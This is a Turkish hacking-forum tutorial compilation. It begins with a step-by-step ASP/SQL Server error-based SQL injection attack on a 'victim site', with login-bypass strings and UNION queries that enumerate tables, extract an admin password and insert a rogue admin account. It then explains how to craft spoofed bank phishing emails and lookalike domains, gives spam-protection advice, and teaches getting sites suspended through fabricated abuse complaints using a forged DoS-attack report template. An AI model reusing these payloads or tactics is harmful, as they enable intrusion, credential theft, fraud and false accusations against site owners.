ASP Sql Enjeksiyon a geçmeden önce bir kaç temel kavrama bakalim;

Veritabani Programları:

Günümüzde, birçok firmanın ürettiği db programları mevcuttur... Ama bunların en bilinenleri ORACLE , SQL SERVER, MS ACCESS, FOX PRO'dur.

SQL Nedir :

Sql (Structured Query Language) bir veritabani dilidir.Uygulama geliştiriciler, bir veritabanina yeni tablo veya veri eklerken,
silerken veya bir veriyi ararken bu dili kullanırlar.Bu anlamda geniş kabul görmüş bir standarttır. Örneğin MS ACCESS'te
bunu yapmanın baska yöntemleri de olsa, sonuçta Sql karşılığı her zaman vardır. Örnek bir Sql ifadesi yazalım;
diyelim ki xchatx tablosundan Hack isimli dökümanin fiyatını bize bulsun:) Sql de sorgulamalar SELECT ile yapılır Bu sorgu yazilisi ;

SELECT fiyat FROM xchatx WHERE dokuman ismi="hack"

SELECT deyiminden sonraki gelen ilk ifade, sorgunun sonundaki WHERE kriterine göre tespit edilen kriterlerin hangi alanlarının
görüntüleneceği bilgisidir. FROM deyiminden sonraki ifade,sorgulkamanin hangi tablodan yapılacağını bildirir. WHERE deyimi
ise , sorgulamanın hangi kriter ya da kriterlere göre yapılacağını belirtmemizi saglar.

Iste SQL ENJEKSİYON DA İLK BASTA SITENIN DB sindeki TABLO İsmini bilmemiz gerekmez mi sizce yoksa SELECT WHERE Falan nasi kullanalım
o nedenle SqL a ilk basta hata verdirip Tablo ismini öğrenmeliyiz.SQL Hata verdirtmek için sunlar yapılabilir:

Asp sql enjeksiyondan bahsedeceğim Asp sitemizin tabiki db si ve sql si olan search engine ya da login barina :

'

Bunu yazıyoruz Egeeer :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value 'xchatx1' to a column of data type
int./index.asp, line 29

Burda illa da line 29 ve index.asp olmak zorunda degil tipa tip
aynisi olmayacak elbette sadece Sytntax error oracle falan çikmasi
lazim...


Başka türlü de Sql hata verdirebilirsiniz

'or 1=1--

" or 1=1--

' or 'a'='a

or 1=1--

') or ('a'='a

" or "a"="a

Bunları da aynen deneyin şimdi o hatayı aldık da ne oldu diyorsanız orda TABLE ismini öğrendik xchatx1 table namemimiz.(yani numaramız :))

Simdi burdan diger tablolarında ismini öğrenmemiz lazim... SELECT* FROM xchatx1 WHERE dokumanID='' or 1=1--'

Burda yaptığımız şey bize xchatx1 table inda dokumanIDsi boş olan şeyi getir ya da 1=1 degerine uyan tabloyu getir dedik burda feyk attik SQL a yani.Burdan diğer table isimlerini de öğreniriz. Sonra istediğimiz şeyi SELECT WHERE deyimlerini kullanarak getiririz. Önümüze...

Şimdi örnek bir saldırı yapalım ve yeni şeyler öğrenelim müritler

ilk önce kurban siteyi seçtik....

Baktık sql açığı da var ' bu işaret ile test ettik açık var yani.

http://http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--UNION SQL a birden çok soru sormak için kullandık

INFORMATON_SCHEMA.TABLES-- ise hiç table ismi bilmediğimiz için
yazdık

Top 1 table_name ise en üstteki tablo anlamına geliyor.

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'serles' to a column of data type int.
/index.asp, line 23

Hatamızı aldık
Top 1 table_name serles mis!

Şimdi işimize yarayacak tablelari öğrenelim mesela admin tablelarini burda da LIKE deyimini kullanicaz içinde admin geçen
kelimeleri getir bize SQL!

http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1
TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25admin%25'--

Hatayı alıyoruz :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value 'admins' to a column of data type int./index.asp, line 3

Burda admin diye başlayan admins diye bir table var. Simdi bu admins table inin column yani sutünlarini öğrenme zamanı!

Kodu yazıyoruz : http://www.siteadi.org/index.asp?catid=3 UNION
SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE = 'admins'--

Burada da INFORMATION_SCHEMA.TABLES yerine INFORMATION_SCHEMA.COFORMATION_SCHEMA.COLUMNS deyimini yazdik. Yani yine feyk attik Yani yine feyk attık sql'e, o da bu feykimizi yedi

Hatayı alalım:

icrosoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'logonID' to a column of data type int. /index.asp, line 22

ilk kolum LogonID çıktı

Şimdi 2.sütunu yazıyoruz:

http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 COLUMN_NAME FROM NFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admins' WHERE COLUMN_NAME NOT IN ('logonID')--

Burada en tepede olan ama LogonID olmayanı istedik ve hatayı görelim


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'logs' to a column of data type int.

Öğrendik adı logs artık şifre neredeyse geliyor :) password detaillerine bakıcaz www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admins' WHERE COLUMN_NAME NOT IN ('logonID','logs','password',details')--

Hata :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC sql Server Driver][sql Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. /index.asp, line 4

İki sütun var şansımıza güvenelim ilk logonu deneyelim :

http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 logon FROM admins--

admins table indeki logon sütunundaki ilk ini seçiyoruz.

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC sql Server Driver][sql Server]Syntax error
converting the nvarchar value 'isko' a column of data type int./index.asp, line 7

veee admin nick geldi şimdi tahribat müritleri işin ennn basit noktasına geldik :)

isko isimli kullanicinin şifresini ver bize SQL:

http://www.siteadi.org/index.asp?catid=3 UNION SELECT TOP 1 password FROM admins where logon=' isko '--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC sql Server Driver][sql Server]Syntax error converting the nvarchar value 'benlamerim' to a column of data type int. /index.asp, line 4

Şifremizi Aldık:benlamerim

Kendimiz de kullanici yaratabiliriz admins table inda logon columnünde

Kodu : http://www.siteadi.org/index.asp?catid=3; INSERT
INTO 'admins' ('logonID', 'logon', 'password', 'details') VALUES
(223,'tahribat','123456','NA')--

tahribat nickli bir admin oluşturduk şireside 123456 işte bu işte bu kadar

Pishing Nedir, Nasıl Korunulur?

ishing online sanal dolandırıcılık sanal alemde çeşitli methodlarca kandırmaca olarak bilinmektedir. Bu yolla genellikle internet kullanıcılarının kredi kart bilgileri, para transferi gerçekleştirdiği çeşitli accountlar, alışveriş siteleri ve para akışı gerçekleştirilen sistemler sadece para değil önemli bir takım bilgi akışını gerçekleştirildiği sistemler ele geçirilmektedir.

Pishing nasıl gerçekleştirilmektedir? genel olarak E-Mail yoluyla gerçekleştirilen pishing yöntemlerinden bahsedecek olursam, öncelikle hedef kullanıcı pishing dolandırıcılığını gerçekleştirecek olacak kişi tarafından izlenmektedir. Bu kurban kişi hangi bankalardan online işlem yapmaktadır, hangi alış veriş sitelerinden alışveriş yapmaktadır diye sağolsun bu konuda kişiye facebook da çok yardımcı olmaktadır. Hedef kullanıcı diyelim ki www.tbtbank.com.tr den işlemlerini gerçekleştiriyor ve tbtbank da müşterilerine hangi E-mail aracılığıyla ulaşıyor mesela musterihizmetleri@tbtbank.com.tr adlı mail ile işte kredi kartı ekstreleri sonra gerçekleştirdiği işlemlerin bilgisi ve yeni kampanyalar ve çeşitli banka hakkında ki bilgilendirmeleri belirtmektedir. Anonymail yöntemi çok yaygındır çeşitli script ve sitelerce bu işlem gerçekleştiriliyor. Hedefe musterihizmetleri@tbtbank.com.tr dan gelmiş gibi bir mail gönderilir mailde ki senaryo tamamen saldırıganın hayal gücüne kalmıştır. Ben meselasize şöylebir senaryoile örnek vereyim
tbtbank.com.tr Bddk’nın yayınlamış olduğu bir bildiri ile online işlem yapanlar belirtmiş oldukları adres bilgilerinitekrardan gözden geçirip ayrıntılı bir şekilde belirtmeleri gerekmektedir aksi halde banka hesaplarınızın kapatılması söz konusudur diye mailde bakıldığında bankadan geldiği için hemen müşteriler bu durumu doğru kabul etmektedir ve mailin altında şöyle bir link yer almaktadır buradan giriş yapıp düzenleyin diye www.tbtbank.com.tr/onlineislemler/internetbankacılığı.aspx mesela örnek verdik

Bankanın orijinal internet bankacılığı giriş yeri orası olabilir fakat o mailin yönlendiği yer bankanın web sitesi olmayabilir.

Bu mail zengin metin editörüyle çok rahat yapılabilir ya da basit bir kaç html koduyla ayrıca saldırgan maili bankanın logoları resimleriyle güçlendirir kibu inandırıcılığını artırır

www.tbtbank.com.tr/onlineislemler/internetbankaciligi.aspx>

Benim kullandığım buydu mesela saldırgan kişi bunu istediği gibi düzenleyebilir ve sizi kendi istediği web sitesine yönlendirir şahıs Tbtbank’ın klonunu yapmıştır muhakkak senin o klon siteye şifre ve müşteri numaran kart numaranı yazmanı sağlayabilir geçenlerde Rusya da bir pishing çetesi çökertildi bir yolu böyledir birde web adreslerinde anlayamayacağınızdeğişiklikler olabilir nasıl mı ?
www.tbdbank.com.tr“ t” yi “d “olarak değiştirirek benzer bir site açmış çokdikkat etmediğiniz sürece yada daldığınız zaman gözünüzden kaçabilir ve saldırgan sizi avlayabilir.
birde gsm operatörü aracı yapılarak nasıl pishing yapılabilir onuda göstereyim sadece 2 örnek vereceğim örnekler çoğaltılabilir fakat o zaman bu doküman da epey uzar kısa kesmek zorundayım. Kişi diyelim TBTcell isimi gsm operatörünün www.tbtgsm.com da bulunan online mesaj servisi kullanıyor saldırgan da bunu biliyor tbtcell müsterileriyle musteri.hizmetleri@tbtcell.com mailiyle irtibata geçiyor hemen tbtcell adına bir anony mail ile kurbana mail gönderir onunda senaryosu şöyle olsun kulanmış olduğunuz tbt süperşifrenizin günü dolmuştur www.tbtcell.com.tr/webmesajcell.aspx den giriş yaparak yeni şifrenizi belirleyindiye saldırıcan da yinebu linki kendi istediği yere yönlendirmişdir yada benzer bir link tir seninkarşına bir forum çıkartır.

eski şifre:
yeni şifre
yeni şifre tekrar

şeklinde sende girersin saldırgan burada kendisine lazım olan eski şifreyi alır ve gerçek siteden bir güzel kullanır . senaryolar tükenmez asl...

Pishing’den Nasıl korunulur?

Genellikle bankaların gönderdikleri mailler spama düşmez daha önce inboxa gelen mail çok zor spama düşer, eğer spama düşüyorsa bir kere işkillenin sonra mail geldikten sonra mutlaka mailin kaynak kodlarını inceleyin kaynağında gelen yer gerçekten bankanın kendi sitesi mi? değil mi? Mümkün oldukça gelen maillerde ki linkere tıklamayın kopyala yapıştır yöntemiyle tarayıcının internet çubuğuna linki kopyala yapıştır yoluyla girin Mouse u üzerine getirdiğinizde linkin alttaki ilerleme çubuğunun bulunduğu yerde farklı bir link mı yok mu dikkat edin birde bankaların gönderdiği linkler ssl şifreli korumalı sayfaların bulunduğu yerden gönderilir https:// olarak bir s fazla dır.

Her zaman mailin içeriğinde ki konuyu ne olur ne olmaz bir google da arayarak doğruluğunu tespit ediniz bir de spoofstick isimli tarayıcı eklentilerini kullanabilirsiniz bu sahteliklere karşı bu bilgi girdiğiniz sitenin gerçekten düşündüğünüz site mi değimli size bildirir

Ayrıntı: http://www.google.com.tr/search?hl=tr&client=firefox-a&rls=org.mozilla%3Atr%3Aofficial&hs=v0w&q=SPOOFSTICK&btnG=Ara&meta=lr%3Dlang_tr

Spam Nedir, Nasıl Korunulur?

Spam hakkında bilgi verecek olursak kısaca spam insanların istemediği bizzat kendisinin talep etmediği mesajları iletileri bir şekilde zorla gönderilmesine denir. Spam olarak gelen iletiler genelde ticari reklam tanıtım mesajları ve insanları kandırmaya yönelik pishing içerikli web siteleri hakkında bilgilendirme yapılır. Spamlar web sitelerinin iletişim bölümleri, (forum, ziyaretçi defterleri yorum bölümleri vb.) cep telefonlarına mesaj olarak ve en çok tercih edilen ve en ucuzu olanda E-posta yoluyla yapılanlardır. Gönderilen mesajlar genelde ilgi çekici mesajlardır örneğin cinsel güç haplarının tanıtımı gibi tabi tüm spamlar böyle değildir.Spamın amacı birilerine bir şekilde tanıtım duyu ve bildirme amaçlı maddi çıkar sağlamasıdır.
Spamı kısaca bu şekilde tanımladıktan sonra dahada detaya inerek spamların nasıl yapıldığı ve spamın yapılmasına olanak sağlayan spamcıların işine yarayan şeylerin şeylerin neler olduğunu öğrenmeliyiz, böylece spam hakkında daha detaylı bilgiye sahip olacağız. Spamcılığı ticaret işine dökmüş insanlar vardır bunlar müşterilerinin reklamlarını binlerce hatta milyonlarca kişiye ulaştırmayı vaat ederler ve kendileri de bundan bir miktar para kazanırlar bu kişiler bilinçsiz kişilerin ulu orta paylaştıkları mail adreslerini oluşturdukları botlar sayesinde toplarlar işte yazdığınız bir yazının altına eklediğiniz mail adresi arama motorlarına ifşa olduysa spam dan kurtuluşunuz forumlarda dikkat ettiyseniz mail adresiniz diğerleri tarafından görülsün mü diye seçenek vardır kayıt olurken bunlar hep spamın önlenmesi içindir bunların detayını korunma yollarında anlattığımda spamcıların kaynaklarını da anlayacaksınız bazı mail serverlerinin korumaları gönderilen iletileri iyi bir süzgeçten geçirerek size ulaştırır belki bir nebze korunursunuz böylece ama sistemlerinde koruma olmayan kendi mail serverini kullanan insanların işleri epey zordur gerçi bu koruma sistemlerinin de spama %100 çözüm ürettiği söylenemez. İşte bu yüzden kendi korumamızı kendimiz sağlayacağız Bu dökümanda aslında birazda size nasıl spamcıların avı olmaktan kurtulacağınızı anlatacağım.

Spamdan Nasıl Korunulur?

Spamdan bir dizi koruma yöntemi vardır ama öncelikle bilinçli bir mail kullanıcısı olacağız Mesela Toplu mail kullanımını ele alalım kaçımız doğru düzgün mail gönderiyoruz arkadaşlarımıza mail gönderir ken toplu mail onları bir konuda bilgilendirmek vb amaçlı veya size göderilen e-posta zincirine kişilistenizdekilerinide dahil edip gönderiyorsunuz ama bilmiyorsunuz ki eklediğiniz,gönderdiğiniz toplu maillerle spamcıların ekmeğine yağ sürüyorsunuz, ne yapalım toplu mail göndermeyelim mi? Yani diyeceksiniz hayır gönderin fakat belli esasları var şudur, görmüşsünüzdür mail gönder(compose) kısmında to,cc ve bcc kısmı vardır.

To(Kime): kime kısmıdır genelde göndereceğimiz maili buraya yazarız toplu mailde göndersek arlarına virgül koyarak göndeririz gider. İşte bu yanlıştır. Bir çok kişiyi böyle yaparak tehlikeye sokarız bir çoğumuz bcc ve cc nin ne işe yaradığını bile bile bilmeyiz CC(carbon copy) birden fazla kişiye mail göndermenize yarar to: kısmıyla aynı görevi görür bir nevi pek farkı yoktur alıcılar tarafından gönderilen tüm mailler görünüz BCC: (Blin Carbon Copy) yani gizli alıcı manasındadır. İşte bizim işimize yarayan kısım budur. Çünkü gönderilen toplumailler eğer bcc kısmına yazılıp gönderilirse mail gönderdiğiniz kişiler maili okuduğunda yalnızca maili ona gönderiyorsunuz gibi sadece gönderen kısmında sizin adresinizi gönderilen kısmında da kendi mailini görür böylece spamdan spamcılardan korunmuş oluruz.



Bu çok önemli bir konudur her gelen maili kafamıza göre iletmemeliyiz bu duruma en çokta hataya işte şu maili şu kadar kişiye göndermezsen kötü kedi döver sever bilmem ne gibi gelen mesajları forward larken yapıyoruz mail göndermek dünyanın en basit işidir ne olacak denir ama bu hususlara dikkat etmez sek istemeden hem kendimizi hem de başkarını tehlikeye sokarız spamcı bakar gönderilen kısmında bir sürü mail var kolay lokma hoop hemen kopyalar ve bir kenara koyar bu mailleri aslına bakarsanız şu kadar kişiye şu maili yolla şu kadar kişiye yolamazsan bu olur gibi söylem ve maillerin çıkış noktaları aslında spamcılardır. Sizin listenizdeki mailleri toplarlar ve kendi işine bakar .

Diğer bir şekilde kendinizi nasıl spamlardan korursunuz sisteminizin süzgeci yetmiyor ve spamdan başınızı kaldıramıyorsunuz sanalda yaptığınız işleri şöyle bir gözden geçirin ben hangi sitelere mail adresimi verdim nerelere mail adresimi yazdım her daim bir siteye üye olurken mail adresiniz gizli olsun forumlarda aleni mail adresinizi paylaşmayın çünkü spamcıların sırf bu sağa, sola yazılan mailleri toplamak amacıyla yazdıkları spam botları vardır bunlar toplarlar sizin mail adreslerinizi biriktirip spam mail göndeririler.

Spam mailler kim tarafından gönderiliyorsa ve bu spamlar ısrarcıysa gelen mailin kaynağını inceleyerek oradan alacağınız ip adresini http://whois.domaintools.com da sorgulatarak hangi sonucudan gelmişse o sunucunun abuse departmanına detaylı birşekilde olayı belirtip şikayet edebilirsiniz Türkiyedeki spamcıyı abuse@ttnet.net.tr ye bildirseniz sizi kale almayabilir ama yabancılar inanın bu işe çok önem veriyor. Ya da mailin üstünde olan spam olarak bildir kısmını işaretleyebilirsiniz.

Mail kaynağı nasıl bulunur 2 büyük servis sağlayıcısının mail kaynağının görüntülenmesini size görüntülü şekilde anlatacağım. Öncelikle Gamile bakalım;

Bana Gelen bir spam Mailden Örnek vereyim dedim J evet mailin yanıtla kısmındaki o işaretine tıkladığımızda iletinin kaynağı görüntülenecektir.

Hotmaile Bakalım;

Şimdi Maillerin kaynağını inceleyelim ;



Bizim için önemli olan Received: from kısmıdır yani bana gönderilen spam ileti 78.188.138.135 ip nosundan gelmiş ip numarasını sorgulayalım bakalım

http://whois.domaintools.com/78.188.138.135

bu bir Türk spamcı, spamcı diyorum çünkü tanım da da belirttiğim gibi benim mailime benim iznim olmadan reklam ileti göndermiş ve bu mail adresiyle hiç bir siteye kayıt olmadım peki mailimi nereden buldu tabi ki www.tahribat.com da imzama mail adresimi yazdığım için. Zaten maili Spam kısmından alıp kaynağına baktım gmail bunu spam algılamış spam olduğunu çözmüş anlayacağınız gmailin filtreleri çok kuvvetlidir. Bu gelen maili abuse@ttnet.net.tr ye bildiriyoruz spamcı olduğunu detayıyla ya da o mail adresi hakkında davada açabiliriz kaynakları filan delil göstererek dediğim gibi Türkiye de pek etkili değil bu şekilde spamdan korunma J mesela gelen başka bir spam maili incelediğimde

http://whois.domaintools.com/213.191.128.25

Mail kaynağında bu bu ip ye whois çektiğimde abuse@iskon.hr mailine rastladım buraya durumu bildireceğiz mail kaynağını komple maile yazıp tarih zaman bilgilerinide yazıp gönderdiğiniz de networkteki hangi sunucudan spam yapılmışsa derhal engellerler bir takın ilkçağ ülkeleri hariç tabi J Fakat bunu bildirmek doğrudan spamı yapana etkisi olmaz neden derseniz adam sunucuya illegal yolardan ulaşmış olabilir veya spam ı pc lere yaydığı bir tür worm ile gerçekleştirebilir ama sunucu ve kişi şu yönden suçlu oluyor spama karşı bir önlem almasa abuse bildirimlerini kaale almasa işte oda suçludur. Ttnet 25. Portu kapattı spam önlemi içine faydası oldu sıfır sadece bazı program vesistemlerin çalışmamasını sağladılar o kadar bana kalırsa bu çözüm değil çözüm olsaydı port kapamayla bilmem neyle bunun önüne diğer avrupa ülkeleri geçerdi çözüm teknolojide ilerlemiş bir Türkiye olmaktadır.

Ülke Bazında Spam oranlarını incelediğimizde; Merkezi ABD'de bulunan bilgi teknolojileri güvenliği ve veri koruma şirketi Sophos tarafından gerçekleştirilen bir araştırma sonucunda bu yılın ikinci çeyreğinde en çok "spam" (istenmeyen) e-mail mesajları kaynağı olan 12 ülke saptandı. Sophos'un, "Kirli Düzine" olarak adlandırdığı söz konusu 12 ülkenin başında ABD bulunurken Türkiye üçüncü sırada yer alıyor. Symantec’in 2009 Mayıs ayı spam raporuna göre ise ABD ile neredeyse aynı oranda Türkiye 2.sırada yer alıyor Türk Telekomun spam girişimleri ne kadar faydalı olduğunu görmüş olduk. Çözümler yeterli değil çünkü bu konudaki alt yapı sağlam değil çözüm port kapama değil veri trafiğine spam filtering sistemi yerleştirmeyle bu işler olur başka ülkelerde ki gibi. Diğer bir sebebi hukuki düzenleme eksikliği ve ceza hafifliği olarak görüyorum .

Spamın Hukuki Boyutu

Spam evet bir suçtur ve bunun bir hukuki boyutu da vardır. Spam ile mücadele Türkiye için belirtecek olursak en az etkili yolu ise Hukuki yola başvurmaktır. Kanunlarımız Spam konusunda ne diyor;
Mevcut Hukuk düzenimiz içerisinde spam konusunda verilen ilk ceza, (savcılık tarafından para cezası olarak tahsil edilmiş olsa bile) başbakanın elektronik posta adresine sürekli mail bombardımanı yapan bir şahıs için " huzur ve rahatını ihlal" suçu kapsamında TCK.m.547 dahilinde verildi.

(TCK. Madde 547 - Her kim, itidal ve muvazene haricinde veya çirkin ve ayıp görünen sair herhangi bir hal ile başkasını alenen incitir veya huzur ve rahatını ihlal ederse on beş güne kadar hafif hapse veya otuz liraya kadar hafif cezayı nakdiye mahkum olur.) demiştir.

Bilişim konusunda Türkiye gelişme sürecinde olduğundan ceza hukuku bu konuda daha geniş düzenlemeler yapmamıştır. Aslına bakarsanız spam konusunu ele alan hukukçu sayısı da 1 elin parmaklarını geçmiyor.

ABD ve Avrupa da ise spam konusunda çok katı cezalar verilmektedir. Ama bu hukuki mücadele ABD’deki büyük bilişim şirketleri tarafından da destekleniyor. http://arsiv.ntvmsnbc.com/news/261066.asp burada mesela bu görülüyor.

Diğer ülkelerdeki Hukuki boyutla ilgili birkaç haber şöyle ;

http://arsiv.sabah.com.tr/2007/11/03/haber,D94DF2F54AD64656B96213997B497DFE.html

http://shiftdelete.net/azili-spamci-hapse-giriyor-5215.html

http://www.techno-labs.com/1/9131/1/Spamciye_250000_avro_ceza.html

Abuse Nedir? Basit Abuse Yöntemleri

Abuse ingilizce de Kelime anlamı olarak Kötüye kullanmak demek yani birisini iyi niyetini suistimal etmekle aynı anlama geliyor. Peki internette bu kavramı nasıl kullanıyorlar? İnternette hizmet veren her sistemde şikayet veHizmetin kötü niyetli kullanımını bildirme seçeneği vardır, abuse Departmanları da denir. Biraz daha reel hayattan örnek verecek olursak daha net anlaşılması için nasıl ki bazı market ve işyerlerinde görüş öneri bildirmek için bir kutu bulunur sende şikayetini önerini teşekkürünü her neyse oraya bildirirsin bu da öyle bilişim sistemlerinin şikayet kutusudur abuse departmanları bir şey anlaşılır dilde anlatacak olursak reel hayattan bir de örnek vereyim. Gıcık olduğun birisi bu dilek ve istek kutusunun olduğu bir şirkette çalışıyorsa sırf ona gıcık olduğundan ötürü onun hakkında olumsuz ne varsa belirtirsin şirketin hangi konularda hassasiyeti var bunu öğrenirsen bu daha da işine yarar be gıcık olduğun kişiyi işten atılmasına onun hakkında kötü fikir oluşmasına sebebp olabilirsin J İnternette de böyledir kişileri kullandıkları sistemlerden attırabilirsin bu yöntemle Yani kısacası kötü niyeti bildirme bölümünü kötüye kullanmaktır. Yani bilişim sistemlerinin kötüye kullanımı bildirmek için oluşturduğu departmanın kötüye kullanılmasıdır.

Gelelim sanal alemde abuse yöntemlerinin neler olduğuna ve bu yöntemleri nasıl kullanacağımıza; bu yönde yapacağımız işlemlerin her zaman köklü bilişim firmalarında daha da etkili olacağını unutmayalım. Bir web sitesi düşünün bunu abuse yöntemiyle nasıl kapattırırız ? Öncelikle domain şirketine abuse yöntemini uygulayacak olursak gıcık olduğumuz birisinin domainin suspend edilmesini istiyoruz(yani dondurulmasını hizmet veremez hale gelmesini) bu kişinin de domain şirketi örneğin enom.com bu büyük bir domain şirketi bu adamların domainleri suspend etmesinde belli başlı kriterler vardır. Bunları kendi web sitelerinde “Term of Services” veya terms şeklinde yer alır. Buradaki kuralları inceleyeceğiz hangi sebeplerden suspend ediyorlar basittir yasadışı barındırma spam sahte cc vb. vb sıralanır bunlar enom dan örnek verecek olursak yine http://www.enom.com/terms/default.asp

Kuralları satış politikaları her şey burada yazmaktadır abuse yöntemiyle suspend etmek istediğiniz site şayet Enom’daysa abuse yöntemini kullanmak istediğiniz site bu şartların tamamını muhakkak ki yerine getiremez. En azından kurallara uymayan bir şeyler olabilir Adamlarda her siteyi her servis sağladıkları siteyi kontrol edecek kapasitede olamadıklarından biz onlara yardımcı olacağız aslında J web sitesinde ki kurala uymayan bölümü gösterip bildireceğiz enom için özel şikayet bölümü var olmayan şirketlerde contact yani iletişim bölümünü kullanınız özel Abuse departmanları da olabilir çoğu hizmet sağlayan firmanın vardır. Enomun bu mesela;
http://www.enom.com/help/AbusePolicy.aspx

Spam içeriği bağlantıyı ya da diğer adamların kurallarına uymayan ne varsa ingilizce olarak belirteceksiniz sakın ola Türkçe yazmayın hiçbir şey elde edemezsiniz. Eğer tam tamına uygunsa ne olacak? Buda şöyle iftira atacaksınız yani böyle bir şey olmasa bile kurallara aykırı bir durum olmasa bile varmışçasına devamlı farklı farklı maillerden kurallara uymuyor, uyulmayan kuralları da atacaksınız kafadan ama destekli atın inandırıcı olsun bu adamlarda ateş olmayan yerden duman çıkmaz hesabı ilgilenip domainin biletini keseceklerdir. Domain geçmişi sağlam iyi bir iöçeriğe sahip bilinmiş bir domainse bu çok zor aslına bakarsanız bu domain firmasından firmasına da değişir hem hostunu hem domainin barındırıyorsa bir şirket daha hassas olacaktır kimi firma daha hassastır kimisi hassas değildir. Godaddy çok hassastır mesela örnek verecek olursak aynı işlemleri orada da deneyebilirsiniz. Birde Mailin geldiği yerin güvenilirliği olması gerekir. Herhangi bir hotmail hesabından gelen farklı olur bir dernekten gelen mail ya da security sitesinden gelen mailin değerlendirilmesi farklı olur org.tr, gov.tr, edu.tr uzantılı maillerden gelen şikayet mailinin değerlendirilmesi bambaşka olur. Genel manada abuse yöntemiyle Domain Suspend etmek gerçekten çok zordur. Çok uğraş gerektirir ama olmayacak bir şey değildir. Yahoo’yu örnek verelim domainler hakkında şikayet olduğunda o kadar hassastır ki ihbarı değerlendirme gereksiniminde bile bulunmaz desem abartmış olmam. çok kişide mağdur olmuştur bu yüzden domaine nazaran bir başka şey vardır ki; o da Hosting Abuse yani bir firmayı hostinginden serverinden attırmak için uygulanır. Domain gibi hosting şirketlerinin de barındırma kuralları vardır kimi örnek verelim Hostgator Hosting firmasını Host gator kurallarını sıralamış;
http://www.hostgator.com/tos.shtml

Bu kurallara aykırı bir durum söz konusu olduğunda siteyi hiç düşünmeden sepetlemektedir. bu firmalarda binlerce domain’e alan sağladıklarından hepsini kontrol edemezler haliylen şikayet üzerine daha çok yoğunlaşırlar. Örneğin bir hack sitesi bu host firmasında kesinlikle barınamaz ispatlarsanız anında sepetlerler aynı domaini de olduğu gibi yasa dışı en ufak faaliyeti varsa hosting firmasının abuse defartmanına bildiriyorsunuz. Yoksa da bildiriyorsunuz J varmışçasına anlatıyorsunuz birkaç örnek vereceğim hosting den kendi sitenize saldırı olduğunu iddaa edebilirsiniz mesela size servere kurulan antidos sisteminin yaptığı nı yapabilirsiniz. Örnek anti dos sistemin saldırı olduğundan saldırı yapılan ip nin domainin whois bilgilerine bakar whois bilgilerinde yazan abuse@.... Şeklinde mail adresine mail gönderir nasıl bir mail gönderir örnek verecek olursam;

“To whom it may concern;
The remote system" 83.1*.*.* " was logged attacking our host 88.*.*.*, this is an automated warning based on admin contacts from the arin.net whois database. Please do not ignore this message " 83.*.*.* "was found to have exceeded acceptable inbound packet flow, we have as such banned the remote host from our network. However to remove the stress from our carrier providers network, we require your assistance to further investigate this issue and see that it does not occure again.

Enclosed below are log portions detailing the attack on our host, all time stamps are GMT +0300.

APF [antidos] log:

Fri, Jul 31, 2009 11:44 am host antidos(29296): 83.*.*.* -> 88.*.*.*

Fri, Jul 31, 2009 11:44 am host antidos(29296): 83.*.*.*-> 88.*.*.* (DROPPED)

Administrative team”

83 e başlayan ip ye kendi sitenizin ip sini yazın 88 le başlayan yerede ister sitenin ipsini isterseniz domain adını yazın Tarihleri de günümüz tarihine göre ayarlayın web sitenizin webmaster@domain.com lu malinden abuse departmanına gönderin veya host şirketinin iletişim böllümüne gönderin. Büyük çoğunlukla işe yaramaktadır bizzat denedim kormayın büyük firmalar çok fazla araştırmaz onlar için güvenilirlik çok daha öemlidir birde şikayetlerin çokluğu çok fazla mail adresinden farklı farklı ip adreslerinden mail gönderirseniz daha etkili olur bunu şöyle düşünün Facebook da ki bir gruba ne kadar çok kişi şikayet bildirirse o kadar çabuk kapatılıyor Facebook tarafından o grup bu da aynı hiçbir farkı yok yada youtubede bir videoyu ne kadar çok kişi spam diye bildirirse o kadar çabuk ve erken kapatılıyor yabancı ülkelerde abuse timi oluşturulduğunu bile duydum birlik olup kıl oldukları sistemleri kapatıyorlar.

Hosting Abuse de Diğer bir Yönteme gelince spam raporu bildirerek bir siteyi hosting den göndermek .

Spam nedir? Konusunu açıklamıştım daha önce öncelikle şikayet edeceğiniz web sitesinde forum yada üyelik gerektiren bir sistem kuruluysa ve aktivasyon yada üye olduğuna dair otomatik gelen bir mail varsa işini daha kolaydır öncelikle forumların çoğunda konuma mesaj yazılınca beni bilgilendir yeri vardır bunu işaretleyeceksin bir konu açacaksın her mesaj yazıldıkça sana o hosttan mail gelecek mail o serverden gelmesi gererk ama adam başka bir pop bağlantısını ayarladıysa foruma olmaz. Daha sonra adamın host şirketindeki abuse departmanına İngilizce olarak bu siteden spam mailer aldığına dair şikayette bulunacaksın sana diyecek ki spmain maillerin kaynak kodlarını içeriğini bana gönder gibisinden mail ile dönüş yapacaklar gelen maillerin kaynaklarını olduğu gibi göndereceksin çok büyük firmalar bunu demiyor bile o zam kaynakları gönderince ve kendi serverini inceleyince de anlayacak bizden bu adama gerçekten mail gitmiş Türkçe yazdığından çoğu şey mailin içeriğine çok bakmazlar forum aracılığıyla spam yapıldığını söyleyecek site sahibine önce uyarı verecek belki senin mail adresini verir gönderme buraya spam diye ya da direk hosttan atabilir, ama unutmayın 